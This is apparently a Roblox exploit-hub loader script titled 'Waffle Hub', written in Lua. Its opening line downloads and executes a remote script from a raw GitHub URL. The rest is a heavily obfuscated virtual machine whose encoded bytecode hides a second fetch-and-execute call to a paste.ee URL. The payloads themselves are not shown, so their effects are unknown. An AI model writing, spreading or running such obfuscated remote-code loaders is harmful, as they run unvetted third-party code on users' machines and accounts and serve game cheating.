--[[
:::       :::     :::     :::::::::: :::::::::: :::        ::::::::::      :::    ::: :::    ::: :::::::::  
:+:       :+:   :+: :+:   :+:        :+:        :+:        :+:             :+:    :+: :+:    :+: :+:    :+: 
+:+       +:+  +:+   +:+  +:+        +:+        +:+        +:+             +:+    +:+ +:+    +:+ +:+    +:+ 
+#+  +:+  +#+ +#++:++#++: :#::+::#   :#::+::#   +#+        +#++:++#        +#++:++#++ +#+    +:+ +#++:++#+  
+#+ +#+#+ +#+ +#+     +#+ +#+        +#+        +#+        +#+             +#+    +#+ +#+    +#+ +#+    +#+ 
 #+#+# #+#+#  #+#     #+# #+#        #+#        #+#        #+#             #+#    #+# #+#    #+# #+#    #+# 
  ###   ###   ###     ### ###        ###        ########## ##########      ###    ###  ########  #########  
--]]
loadstring(game:HttpGet("https://raw.githubusercontent.com/WaffleManTheGreat/DirtySpoon-FTrident/main/coregui"))()

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=function(v31,v32,v33)if v33 then local v77=0 + 0 + 0;local v78;while true do if (v77==((509 -(275 + 234)) + 0)) then v78=(v31/((2 -0)^(v32-1)))%((4 -2)^(((v33-(1 + 0)) -(v32-1)) + (1236 -(1 + 16 + 1218))));return v78-(v78%(1 + 0));end end else local v79=0 + 0;local v80;while true do if (v79==(1092 -(1017 + 75))) then v80=(3 -(1348 -(156 + 1191)))^(v32-((4 -2) -1));return (((v31%(v80 + v80))>=v80) and (190 -(56 + 133))) or (1864 -(543 + 1239 + 82));end end end end;v22=nil;v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1;return v39;end;v23=nil;v18=2;end if (v18==5) then v30=nil;v30=function(v34,v35,v36)local v40=v34[1];local v41=v34[2];local v42=v34[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (v69==1) then v72={...};v73=v12("#",...) -1;v69=2;end if (v69==0) then v70=1;v71= -1;v69=1;end if (v69==2) then v74=nil;v74=function()local v85=v40;local v86=v41;local v87=v42;local v88=v28;local v89={};local v90={};local v91={};for v95=400 -(161 + (431 -192)),v73 do if ((v95>=v87) or ((2769 -((1331 -729) + 389))<=(483 -140))) then v89[v95-v87]=v72[v95 + 1 + 0];else v91[v95]=v72[v95 + (1 -0)];end end local v92=(v73-v87) + (1027 -(121 + 181 + 724));local v93;local v94;while true do local v96=788 -(21 + 767);local v97;local v98;while true do if (((296 -(50 + 245))==v96) or ((6436 -(962 + 540))==(35 + 2266))) then while true do if ((v97==(0 -0)) or ((6022 -(480 + 664))<(555 + 921))) then v98=0 -0;while true do if (((3730 -1093)<=(5602 -(127 + 530))) and (v98==(1 + 0))) then if ((((1327 -(18 + 12)) -(604 + 155))<=(7 + 406 + 3774)) and (v94<=(2 + 0 + 0))) then if (((571 -378)<=(5170 -((2745 -(1662 + 63)) + 848))) and (v94<=(0 + 0))) then v91[v93[5 -3]]=v93[3];elseif ((v94>(1499 -((2027 -(223 + 775)) + 469))) or ((6770 -3750)==(970 -(97 + 380)))) then v91[v93[1628 -(1053 + 573)]]=v36[v93[1525 -(356 + 1166)]];else local v124=0 -0;local v125;local v126;local v127;while true do if ((v124==(1 + 0)) or (((5282 + 4255) -5705)>=4496)) then v127=nil;while true do if ((((2031 -(546 + 9)) -(1308 + 167))==v125) or ((906 + 153)>(4641 -(5 + 172)))) then v91[v126 + (1998 -(752 + 1245))]=v127;v91[v126]=v127[v93[87 -(65 + 18)]];break;end if (((123 + 2334)==(1271 + 1186)) and (((441 + 547) -(71 + (2888 -(1970 + 1))))==v125)) then local v150=75 -(28 + (1780 -(1020 + 713)));while true do if (((2927 -(1330 + 471))<=(5414 -((2669 -1519) + 80))) and (v150==(0 -(0 + 0)))) then v126=v93[1075 -(6 + 17 + 824 + 226)];v127=v91[v93[(1221 -(1020 + 199)) + (3 -2)]];v150=1;end if ((v150==(1 + 0)) or ((2509 + 1220)<=1754)) then v125=1 + 0;break;end end end end break;end if ((v124==(0 + 0)) or ((865 -(31 + 22))<(79 -46))) then v125=98 -(49 + 49);v126=nil;v124=2 -1;end end end elseif (((3464 -(439 + 481))>=(1730 -(258 + 67))) and (v94<=(5 -1))) then if (((3685 + 528)>(9009 -5244)) and (v94==(873 -((1077 -706) + 499)))) then do return;end else local v128=0 + 0;local v129;local v130;local v131;local v132;local v133;while true do if ((v128==0) or ((4011 -(540 + (817 -587)))<=262)) then v129=(16 -(4 + 12)) -0;v130=nil;v128=(1 + 0) -0;end if ((v128==(1209 -(490 + 718))) or ((2524 -(296 + 479))>(1523 + 3257))) then v131=nil;v132=nil;v128=3 -1;end if ((v128==(1131 -(314 + 815))) or ((3442 -(1061 + 715))>=2911)) then v133=nil;while true do if (((2402 -905)==(1302 + 195)) and (v129==(4 -2))) then for v157=v130,v71 do local v158=0;local v159;local v160;while true do if (((2758 -1573)==(719 + 466)) and (v158==(1 -0))) then while true do if (((44 + 732)==(814 -(16 + 22))) and (v159==(1600 -(315 + 703 + 582)))) then v160=0 -0;while true do if ((v160==(0 -0)) or (((53268 -42058) -6283)==(334 + 2135))) then v133=v133 + (633 -(99 + 533));v91[v157]=v131[v133];break;end end break;end end break;end if ((v158==(607 -(477 + 130))) or ((1555 + 2343)==(1138 -(115 + 400)))) then v159=102 -(69 + 33);v160=nil;v158=2 -1;end end end break;end if (((0 -0)==v129) or ((341 + 3064)<=(6300 -4330))) then local v151=0 + 0;while true do if (((1366 -724)==(1769 -(680 + 447))) and (v151==(0 -0))) then v130=v93[3 -1];v131,v132=v88(v91[v130](v13(v91,v130 + (2 -(1 + 0)),v93[1 + 1 + 1])));v151=1 + 0 + 0;end if (((3035 + 1301)==(1196 + 3140)) and ((1 -0)==v151)) then v129=1202 -(972 + (1590 -(874 + 487)));break;end end end if ((v129==(168 -(62 + 105))) or ((2417 -((6333 -4666) + 330))==((3938 -2017) -(1463 + 22)))) then v71=(v132 + v130) -(2 -(3 -2));v133=0 + 0;v129=1 + (1976 -(265 + 1710));end end break;end end end elseif ((v94>(531 -(519 + (12 -5)))) or ((2515 + (7394 -5735))<=((4693 + 2186) -2890))) then local v134=0 + 0;local v135;local v136;while true do if ((v134==(0 + 0)) or ((4394 -2971)<=(1972 -1208))) then v135=701 -(121 + 580);v136=nil;v134=1 + 0;end if ((v134==(1 -0)) or ((1210 -(27 + 131))<=(1845 -1186))) then while true do if ((v135==((2159 -955) -(311 + 893))) or ((583 + 753)>=(2644 + 560))) then v136=v93[1215 -(894 + 319)];v91[v136]=v91[v136](v13(v91,v136 + (837 -(236 + 600)),v71));break;end end break;end end else v91[v93[524 -(142 + 380)]]();end v70=v70 + 1 + 0;break;end if ((2144<4134) and (v98==(0 -0))) then local v110=1499 -((1055 -635) + 1079);local v111;while true do if (((667 + 1192)==(3609 -(1582 + 168))) and (v110==(0 -0))) then v111=426 -(97 + 329);while true do if ((v111==(1 + 0)) or ((126 + 873)>=(733 + 448))) then v98=1 + 0;break;end if (((5639 -(649 + 932))==(10627 -(8501 -(561 + 1371)))) and ((353 -(68 + 285))==v111)) then v93=v85[v70];v94=v93[1571 -(1224 + (499 -153))];v111=1 + 0;end end break;end end end end break;end end break;end if (((1066 + 434)==(1728 -(14 + 214))) and (v96==(0 -0))) then v97=0 -0;v98=nil;v96=1 + 0;end end end end;v69=3;end if (v69==3) then A,B=v28(v11(v74));if  not A[1] then local v99=v34[4][v70] or "?";error("Script error at ["   .. v99   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end end end;end;return v30(v29(),{},v17)(...);end if (v18==2) then v23=function()local v43=0 + 0;local v44;local v45;while true do if (v43==(1920 -(1853 + 66))) then return (v45 * (763 -507)) + v44;end if (v43==((1833 -(512 + 195)) -(617 + 509))) then v44,v45=v1(v16,v19,v19 + 2 + 0);v19=v19 + (760 -(277 + 482)) + 1;v43=1245 -(358 + 886);end end end;v24=nil;v24=function()local v46=0 + 0;local v47;local v48;local v49;local v50;while true do if (v46==(0 -0)) then v47,v48,v49,v50=v1(v16,v19,v19 + ((450 + 1308) -(1385 + 180 + 190)));v19=v19 + (9 -5);v46=539 -(464 + 74);end if (v46==(1 -0)) then return (v50 * (16778435 -(225 + 488 + 506))) + (v49 * 65536) + (v48 * (1280 -((1380 -(841 + 328)) + 813))) + v47;end end end;v25=nil;v18=3;end if (v18==3) then v25=function()local v51=1766 -(1145 + 213 + 408);local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(1 + 1)) then v56=v21(v53,21,120 -89);v57=((v21(v53,84 -52)==(2 -1)) and  -(1 + 0)) or (1 + 0 + 0);v51=4 -1;end if ((0 -0)==v51) then v52=v24();v53=v24();v51=1 + 0;end if ((1600 -((3275 -2210) + 534))==v51) then v54=3 -2;v55=(v21(v53,2 -1,46 -26) * (2^(46 -14))) + v52;v51=(629 -(401 + 224)) -2;end if (v51==(2 + 1)) then if (v56==(163 -(129 + 34))) then if (v55==(0 + 0)) then return v57 * (969 -(807 + 162));else v56=2 -1;v54=0 + 0;end elseif (v56==(4597 -2550)) then return ((v55==(0 + 0)) and (v57 * (1/0))) or (v57 * NaN);end return v8(v57,v56-(923 + 100)) * (v54 + (v55/(2^(72 -20))));end end end;v26=nil;v26=function(v37)local v58;if  not v37 then v37=v24();if (v37==0) then return "";end end v58=v3(v16,v19,(v19 + v37) -(1 + 0));v19=v19 + v37;local v59={};for v75=1 -0, #v58 do v59[v75]=v2(v1(v3(v58,v75,v75)));end return v6(v59);end;v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then local v81=0;while true do if (v81==0) then v20=v0(v3(v38,1,1));return "";end end else local v82=v2(v0(v38,16));if v20 then local v83=0;local v84;while true do if (v83==1) then return v84;end if (v83==0) then v84=v5(v82,v20);v20=nil;v83=1;end end else return v82;end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v60=0;local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;while true do if (v60~=(2 -0)) then else v65=nil;v66=nil;v60=3;end if (v60==4) then while true do if (v61~=1) then else local v100=0;local v101;while true do if (v100==(0 -0)) then v101=0;while true do if (v101==(1 + 0)) then v61=2;break;end if (v101==(0 + 0)) then v64=nil;v65=nil;v101=1423 -(740 + 682);end end break;end end end if (v61~=(0 + 0)) then else v62=0 -0;v63=nil;v61=1;end if (3==v61) then v68=nil;while true do local v103=0;local v104;while true do if (v103~=(0 + 0)) then else v104=0;while true do if (v104==(0 + 0)) then local v109=0;while true do if (v109~=0) then else if (v62~=(0 -0)) then else local v114=1700 -(18 + 1682);local v115;while true do if (v114==0) then v115=0;while true do if (v115~=(1755 -(788 + 966))) then else local v139=0;while true do if (v139==(0 -0)) then v65={};v66={v63,v64,nil,v65};v139=1;end if (v139~=1) then else v115=2 -0;break;end end end if (v115==(0 -0)) then v63={};v64={};v115=1;end if (v115==2) then v62=1 + 0;break;end end break;end end end if (v62~=(2 -1)) then else local v116=0;local v117;local v118;while true do if (v116~=(2 -1)) then else while true do if (v117==(1708 -(367 + 1341))) then v118=0;while true do if (v118==(1417 -(658 + 758))) then for v161=1,v67 do local v162=0;local v163;local v164;local v165;while true do if (1~=v162) then else v165=nil;while true do if (v163==1) then if (v164==1) then v165=v22()~=0;elseif (v164==(164 -(41 + 121))) then v165=v25();elseif (v164~=3) then else v165=v26();end v68[v161]=v165;break;end if (v163==(0 -0)) then local v178=0;local v179;while true do if (v178~=0) then else v179=0 -0;while true do if (v179==(0 -0)) then v164=v22();v165=nil;v179=1;end if (v179==1) then v163=957 -(571 + 385);break;end end break;end end end end break;end if ((0 -0)==v162) then local v174=0 + 0;while true do if (v174==(0 -0)) then v163=0;v164=nil;v174=1;end if ((1500 -(1367 + 132))~=v174) then else v162=1;break;end end end end end v66[960 -(101 + 856)]=v22();v118=3 -1;end if (v118~=(295 -(124 + 171))) then else local v155=0;local v156;while true do if (v155~=0) then else v156=0 + 0;while true do if (v156~=(0 + 0)) then else local v175=0;while true do if (1==v175) then v156=656 -(363 + 292);break;end if (v175==(659 -(217 + 442))) then v67=v24();v68={};v175=1;end end end if (v156==1) then v118=1;break;end end break;end end end if (v118==(2 -0)) then v62=2 + 0;break;end end break;end end break;end if (v116==(470 -(381 + 89))) then v117=0;v118=nil;v116=1028 -(917 + 110);end end end v109=1;end if (v109==1) then v104=1 + 0;break;end end end if (v104~=1) then else if (v62==2) then local v112=0;local v113;while true do if (v112~=0) then else v113=0;while true do local v121=361 -(71 + 290);while true do if (v121==(0 + 0)) then if (v113==0) then for v140=1 -0,v24() do local v141=0 -0;local v142;while true do if (v141~=0) then else v142=v22();if (v21(v142,3 -2,1 + 0)~=0) then else local v169=0;local v170;local v171;local v172;local v173;while true do if (v169==(0 -0)) then v170=264 -(61 + 203);v171=nil;v169=1;end if (v169==(1 + 1)) then while true do if (v170==(2 -1)) then local v180=0;while true do if (1==v180) then v170=2;break;end if (v180==(0 + 0)) then local v188=1549 -(382 + 1167);while true do if (v188~=1) then else v180=737 -(705 + 31);break;end if (v188~=(0 + 0)) then else v173={v23(),v23(),nil,nil};if (v171==0) then local v194=641 -(484 + 157);local v195;local v196;local v197;while true do if (1==v194) then v197=nil;while true do if (v195~=(1 + 0)) then else while true do if (v196==0) then v197=875 -(82 + 793);while true do if (v197~=0) then else v173[4 -1]=v23();v173[1622 -(162 + 1456)]=v23();break;end end break;end end break;end if (v195==0) then local v200=0;while true do if (v200~=(0 -0)) then else v196=0 -0;v197=nil;v200=1;end if (v200~=1) then else v195=1371 -(277 + 1093);break;end end end end break;end if (v194~=0) then else v195=1032 -(413 + 619);v196=nil;v194=1924 -(44 + 1879);end end elseif (v171==(737 -(344 + 392))) then v173[5 -2]=v24();elseif (v171==(1648 -(240 + 1406))) then v173[3 + 0]=v24() -(2^16);elseif (v171==3) then local v201=0;local v202;while true do if (v201==0) then v202=0 -0;while true do if (v202==0) then v173[3]=v24() -((2 -0)^16);v173[4 + 0]=v23();break;end end break;end end end v188=662 -(354 + 307);end end end end end if (v170==0) then local v181=0 + 0;while true do if ((528 -(9 + 519))==v181) then local v189=0;while true do if (0==v189) then v171=v21(v142,1 + 1,3);v172=v21(v142,3 + 1,4 + 2);v189=1 + 0;end if ((662 -(162 + 499))==v189) then v181=1;break;end end end if (v181~=1) then else v170=1;break;end end end if (v170==(4 -2)) then local v182=0;while true do if (v182==(0 + 0)) then if (v21(v172,1,1)~=(1570 -(348 + 1221))) then else v173[461 -(20 + 439)]=v68[v173[2]];end if (v21(v172,1 + 1,2)==1) then v173[517 -(271 + 243)]=v68[v173[6 -3]];end v182=1 + 0;end if (v182~=(3 -2)) then else v170=2 + 1;break;end end end if (v170==(10 -7)) then if (v21(v172,9 -6,3)~=1) then else v173[4]=v68[v173[667 -(100 + 563)]];end v63[v140]=v173;break;end end break;end if (v169==(1 + 0)) then local v176=0 + 0;while true do if (1~=v176) then else v169=2 + 0;break;end if (v176==0) then v172=nil;v173=nil;v176=1;end end end end end break;end end end for v143=1,v24() do v64[v143-1]=v29();end v113=246 -(75 + 170);end if (v113==(1290 -(876 + 413))) then for v145=1303 -(1223 + 79),v24() do v65[v145]=v24();end return v66;end break;end end end break;end end end break;end end break;end end end break;end if (v61==(554 -(530 + 22))) then local v102=1092 -(1057 + 35);while true do if (v102==(1943 -(723 + 1220))) then v66=nil;v67=nil;v102=628 -(340 + 287);end if (v102==1) then v61=1074 -(274 + 797);break;end end end end break;end if (v60==1) then v63=nil;v64=nil;v60=5 -3;end if (v60==0) then v61=0;v62=nil;v60=1;end if ((3 -0)==v60) then v67=nil;v68=nil;v60=4;end end end;v18=5;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031A3O00682O7470733A2O2F70617374652E2O652F722F4B6C674E5A2F3000083O0012023O00013O001202000100023O00200100010001000300122O000300044O0004000100034O00065O00022O00053O000100012O00033O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
